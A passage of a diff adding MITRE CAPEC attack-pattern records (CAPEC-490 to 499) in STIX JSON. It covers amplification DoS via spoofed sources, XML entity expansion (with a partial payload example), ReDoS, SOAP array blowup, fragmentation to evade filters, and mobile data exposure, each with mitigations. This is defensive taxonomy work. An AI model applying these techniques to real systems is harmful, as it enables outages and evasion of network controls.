"3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fb2ec194-be12-4cc9-8d13-70492fffaff4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "spec_version": "2.1", + "target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an amplification where the size of a response is far greater than that of the request that generates it. The goal of this attack is to use a relatively few resources to create a large amount of traffic against a target server. To execute this attack, an adversary send a request to a 3rd party service, spoofing the source address to be that of the target server. The larger response that is generated by the 3rd party service is then sent to the target server. By sending a large number of initial requests, the adversary can generate a tremendous amount of traffic directed at the target. The greater the discrepancy in size between the initial request and the final payload delivered to the target increased the effectiveness of this attack.", + "external_references": [ + { + "external_id": "CAPEC-490", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/490.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service:Reflection Amplification", + "external_id": "T1498.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/002" + } + ], + "id": "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Amplification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the existence of a 3rd party service that generates a response that is significantly larger than the request that triggers it." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can attempt to identify the 3rd party services being used in an active attack and blocking them until the attack ends. This can be accomplished by filtering traffic for suspicious message patterns such as a spike in traffic where each response contains the same large block of data. Care should be taken to prevent false positive rates so legitimate traffic isn't blocked.", + "id": "course-of-action--d0ed5ae3-a632-40b6-adec-abee22f9f753", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-490-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f777f7b6-4f71-48a6-89b5-694f5210cb6b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0ed5ae3-a632-40b6-adec-abee22f9f753", + "spec_version": "2.1", + "target_ref": "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits macro-like substitution to cause a denial of service situation due to excessive memory being allocated to fully expand the data. The result of this denial of service could cause the application to freeze or crash. This involves defining a very large entity and using it multiple times in a single entity substitution. CAPEC-197 is a similar attack pattern, but it is easier to discover and defend against. This attack pattern does not perform multi-level substitution and therefore does not obviously appear to consume extensive resources.", + "external_references": [ + { + "external_id": "CAPEC-491", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/491.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Quadratic Data Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "XML Entity Expansion (XEE)" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Denial of Service)", + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example the attacker defines one large entity and refers to it many times.\n ... [100K of them] ...AAAA\">]>&x;&x;... [100K of them]...&x;&x;\n This results in a relatively small message of 100KBs that will expand to a message in the GB range.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: An adversary determines the input data stream that is being processed by a data parser that supports using substituion on the victim's side.

    2. Techniques
    Use an automated tool to record all instances of URLs to process requests.
    Use a browser to manually explore the website and analyze how the application processes requests.

Exploit

  1. Craft malicious payload: The adversary crafts malicious message containing nested quadratic expansion that completely uses up available server resource.

  2. Send the message: Send the malicious crafted message to the target URL.

", + "x_capec_prerequisites": [ + "This type of attack requires a server that accepts serialization data which supports substitution and parses the data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02109430-cdab-456f-831f-cbf8dc34209a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "spec_version": "2.1", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aad3b8f3-e7c0-49fd-8535-2db1e2a789ee", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "spec_version": "2.1", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.", + "external_references": [ + { + "external_id": "CAPEC-492", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/492.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "external_id": "CWE-1333", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1333.html" + }, + { + "description": "Regular expression Denial of Service - ReDoS", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS" + }, + { + "description": "Bryan Sullivan, Regular Expression Denial of Service Attacks and Defenses", + "external_id": "REF-421", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-au/magazine/ff646973.aspx" + } + ], + "id": "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Regular Expression Exponential Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The algorithm builds a finite state machine and based on the input transitions through all the states until the end of the input is reached. NFA engines may evaluate each character in the input string multiple times during the backtracking. The algorithm tries each path through the NFA one by one until a match is found; the malicious input is crafted so every path is tried which results in a failure. Exploitation of the Regex results in programs hanging or taking a very long time to complete. These attacks may target various layers of the Internet due to regular expressions being used in validation.\n ", + "x_capec_prerequisites": [ + "This type of an attack requires the ability to identify hosts running a poorly implemented Regex, and the ability to send crafted input to exploit the regular expression." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test custom written Regex with fuzzing to determine if the Regex is a poor one. Add timeouts to processes that handle the Regex logic. If an evil Regex is found rewrite it as a good Regex.", + "id": "course-of-action--304c8c69-2778-4990-bcbc-b9dcdf357054", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-492-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbd942cb-719b-4645-a9fe-77e24232dbee", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--304c8c69-2778-4990-bcbc-b9dcdf357054", + "spec_version": "2.1", + "target_ref": "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an attack on a web service that uses SOAP messages in communication. By sending a very large SOAP array declaration to the web service, the attacker forces the web service to allocate space for the array elements before they are parsed by the XML parser. The attacker message is typically small in size containing a large array declaration of say 1,000,000 elements and a couple of array elements. This attack targets exhaustion of the memory resources of the web service.", + "external_references": [ + { + "external_id": "CAPEC-493", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/493.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "SOAP Array Attack", + "external_id": "REF-422", + "source_name": "reference_from_CAPEC", + "url": "http://www.ws-attacks.org/index.php/Soap_Array_Attack" + } + ], + "id": "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "modified": "2019-09-30T00:00:00.000Z", + "name": "SOAP Array Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the attacker to know the endpoint of the web service, and be able to reach the endpoint with a malicious SOAP message." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don't match drop the SOAP packet at the web service layer.", + "id": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-493-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d8f6f476-720d-4647-8211-640732114f60", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "spec_version": "2.1", + "target_ref": "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules of network controls, by attempting to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered.", + "external_references": [ + { + "external_id": "CAPEC-494", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Security Considerations - IP Fragment Filtering", + "external_id": "REF-423", + "source_name": "reference_from_CAPEC", + "url": "https://www.rfc-editor.org/rfc/rfc1858.txt" + } + ], + "id": "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "modified": "2022-02-22T00:00:00.000Z", + "name": "TCP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n In comparison, IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. This behavior of fragmentation defeats some IPS and firewall filters who typically check the FLAGS in the header of the first packet since dropping this packet prevents the following fragments from being processed and assembled.\n Another variation is overlapping fragments thus that an innocuous first segment passes the filter and the second segment overwrites the TCP header data with the true payload which is malicious in nature. The malicious payload manipulated properly may lead to a DoS due to resource consumption or kernel crash. Additionally the fragmentation could be used in conjunction with sending fragments at a rate slightly slower than the timeout to cause a DoS condition by forcing resources that assemble the packet to wait an inordinate amount of time to complete the task. The fragmentation identification numbers could also be duplicated very easily as there are only 16 bits in IPv4 so only 65536 packets are needed.\n ", + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the adversary needs to ability to send TCP packets of arbitrary size with crafted data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by enforcing rules at the router following the guidance of RFC1858. The essential part of the guidance is creating the following rule \"IF FO=1 and PROTOCOL=TCP then DROP PACKET\" as this mitigated both tiny fragment and overlapping fragment attacks in IPv4. In IPv6 overlapping(RFC5722) additional steps may be required such as deep packet inspection. The delayed fragments may be mitigated by enforcing a timeout on the transmission to receive all packets by a certain time since the first packet is received. According to RFC2460 IPv6 implementations should enforce a rule to discard all fragments if the fragments are not ALL received within 60 seconds of the FIRST arriving fragment.", + "id": "course-of-action--8d367dc3-d87f-4810-8600-406d591143ad", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-494-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c63b7b2-466c-4c0a-9b40-4dc3b26ad502", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8d367dc3-d87f-4810-8600-406d591143ad", + "spec_version": "2.1", + "target_ref": "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.", + "external_references": [ + { + "external_id": "CAPEC-495", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/495.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Yossi Gilad, Amir Herzberg, Fragmentation Considered Vulnerable, 2012", + "external_id": "REF-424", + "source_name": "reference_from_CAPEC", + "url": "http://u.cs.biu.ac.il/~herzbea/security/12-03%20fragmentation.pdf" + } + ], + "id": "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "modified": "2019-04-04T00:00:00.000Z", + "name": "UDP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the attacker to be able to generate fragmented IP traffic containing crafted data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by changing default cache sizes to be larger at the OS level. Additionally rules can be enforced to prune the cache with shorter timeouts for packet reassembly as the cache nears capacity.", + "id": "course-of-action--30d838cf-1c32-4edd-b3aa-796095ba5314", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-495-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a8d2ca3-6686-47c3-ba2b-0bd391ee4af9", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--30d838cf-1c32-4edd-b3aa-796095ba5314", + "spec_version": "2.1", + "target_ref": "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.", + "external_references": [ + { + "external_id": "CAPEC-496", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/496.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "ICMP Attacks Illustrated", + "external_id": "REF-425", + "source_name": "reference_from_CAPEC", + "url": "http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats" + } + ], + "id": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "modified": "2019-04-04T00:00:00.000Z", + "name": "ICMP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated through egress filtering based on ICMP payload so a network is a \"good neighbor\" to other networks. Bad IP implementations become patched, so using the proper version of a browser or OS is recommended.", + "id": "course-of-action--f1132180-9c58-4be8-8ef6-dedb17aed57e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-496-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4385941-4381-4b52-8fff-1a5170cad3da", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1132180-9c58-4be8-8ef6-dedb17aed57e", + "spec_version": "2.1", + "target_ref": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in probing and exploration activities to determine if common key files exists. Such files often contain configuration and security parameters of the targeted application, system or network. Using this knowledge may often pave the way for more damaging attacks.", + "external_references": [ + { + "external_id": "CAPEC-497", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/497.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "File and Directory Discovery", + "external_id": "T1083", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1083" + } + ], + "id": "attack-pattern--323ed142-7793-413d-838f-72626caf58da", + "modified": "2020-12-17T00:00:00.000Z", + "name": "File Discovery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6" + ], + "x_capec_prerequisites": [ + "The adversary must know the location of these common key files." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage file protection mechanisms to render these files accessible only to authorized parties.", + "id": "course-of-action--54c4cc5a-fe59-4f27-82bc-a2e6d27d80b7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-497-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--47804bd8-6b7f-435e-b2e4-277a8a51384e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--54c4cc5a-fe59-4f27-82bc-a2e6d27d80b7", + "spec_version": "2.1", + "target_ref": "attack-pattern--323ed142-7793-413d-838f-72626caf58da", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. This attack targets temporary screenshots created by the underlying OS while the application remains open in the background.", + "external_references": [ + { + "external_id": "CAPEC-498", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/498.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Jonathan Zdziarksi, Hacking and Securing iOS Applications (First Edition), 2012, O'Reilly Media, Inc.", + "external_id": "REF-426", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Probe iOS Screenshots", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface. This attack differs from CAPEC-648, which targets intentional screenshots initiated by an end-user that are stored in the device's storage.", + "x_capec_prerequisites": [ + "This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an application that may display sensitive information should clear the screen contents before a screenshot is taken. This can be accomplished by setting the key window's hidden property to YES. This code to hide the contents should be placed in both the applicationWillResignActive() and applicationDidEnterBackground() methods.", + "id": "course-of-action--bf6e6d14-40c1-4f5f-9acd-1ad186a51940", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-498-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04be062d-d511-410f-99c9-f9f7993a39af", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf6e6d14-40c1-4f5f-9acd-1ad186a51940", + "spec_version": "2.1", + "target_ref": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, intercepts messages from a trusted Android-based application in an attempt to achieve a variety of different objectives including denial of service, information disclosure, and data injection. An implicit intent sent from a trusted application can be received by any application that has declared an appropriate intent filter. If the intent is not protected by a permission that the malicious application lacks, then the attacker can gain access to the data contained within the intent. Further, the intent can be either blocked from reaching the intended destination, or modified and potentially forwarded along.", + "external_references": [ + { + "external_id": "CAPEC-499", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/499.html" + }, + { + 